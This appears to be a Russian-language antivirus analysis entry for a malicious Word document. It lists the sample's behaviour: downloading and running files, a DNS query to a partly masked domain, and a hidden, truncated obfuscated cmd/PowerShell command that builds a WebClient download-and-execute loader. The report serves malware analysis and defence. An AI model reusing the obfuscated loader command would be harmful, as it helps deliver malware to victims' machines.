Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c set a=power&& set b=she&& set c=ll&& call %a%%b%%c% $GFtgyZK = 'HdJrs459m';$b4BUM = new-object System.Net.WebClient;$SitVyzm = 'Rmd9Nq3l';$vVPThS = (New-Object -ComObject word.application).v...
Сетевая активность
UDP
- DNS ASK of#####app-update.bid
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c set a=power&& set b=she&& set c=ll&& call %a%%b%%c% $GFtgyZK = 'HdJrs459m';$b4BUM = new-object System.Net.WebClient;$SitVyzm = 'Rmd9Nq3l';$vVPThS = (New-Object -ComObject word.application).v...' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\winword.exe' /Automation -Embedding
